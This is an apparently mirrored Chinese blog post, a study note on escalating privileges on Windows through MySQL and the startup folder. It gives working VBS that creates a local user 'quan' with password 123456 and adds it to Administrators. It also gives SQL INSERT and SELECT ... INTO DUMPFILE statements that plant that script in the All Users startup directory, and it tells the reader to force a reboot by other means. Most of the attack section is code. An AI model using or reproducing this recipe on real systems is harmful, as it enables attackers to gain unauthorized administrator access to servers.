zoukankan      html  css  js  c++  java
  • Day4——提权学习之MySQL数据库(启动项提权)

    0x00 原理

    重启服务器会自动调用导入到 C:Documents and SettingsAll Users「开始」菜单程序启动下的VBS脚本,并执行其中的用户添加及提权命令。

    0x01 利用条件

    两种情况下均可用启动项提权
    1、C:Documents and SettingsAll Users「开始」菜单程序启动 目录可读写
    直接将 VBS 提权脚本上传到该目录下

    2、以root账号登陆MySQL

    0x02 提权关键

    启动目录下的vbs脚本

    0x03 提权步骤

    一、上传VBS提权脚本到启动目录
    VBS 提权脚本代码如下:

    setwsnetwork=CreateObject(“WSCRIPT.NETWORK”)
    os=”WinNT://”&wsnetwork.ComputerName
    Set ob=GetObject(os)
    Setoe=GetObject(os&”/Administrators,group”)
    Set od=ob.Create(“user”,”quan”)
    od.SetPassword “123456”
    od.SetInfo
    Set of=GetObject(os&“/quan”,user)
    oe.add os&“/quan”
    

    二、将数据库表中内容导入到启动目录
    1、登录mysql
    2、在test数据库下新建表
    create table secist(cmd text);

    3、插入vbs脚本

    insert into secist values(“set wshshell=createobject(“”wscript.shell””)”);
    insert into secist values(“a=wshshell.run(“”cmd.exe /c net user quan 123456 /add“”,0)”);
    insert into secist values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators quan /add“”,0)”);
    

    4、导出vbs脚本到启动选项

    select * from secist into dumpfile “C:Documents and SettingsAll Users「开始」菜单程序启动quan.vbs”;
    

    5、利用其他手段使服务器重启后就提权成功了

    0x04 参考

    https://www.cnblogs.com/wh4am1/p/6613759.html
    《网络攻防实战研究——漏洞利用与提权》5.7.2

  • 相关阅读:
    HDU 1098 Ignatius's puzzle 也不大懂
    HDU 1099 Lottery
    图算法-Prime
    并查集
    CSS笔记2
    css笔记1
    HDU 5019 Revenge of GCD
    POJ 2255 Tree Recovery
    判断两条线段是否相交
    PAT 数列求和-加强版   (20分)(简单模拟)
  • 原文地址:https://www.cnblogs.com/0nc3/p/12071340.html
Copyright © 2011-2022 走看看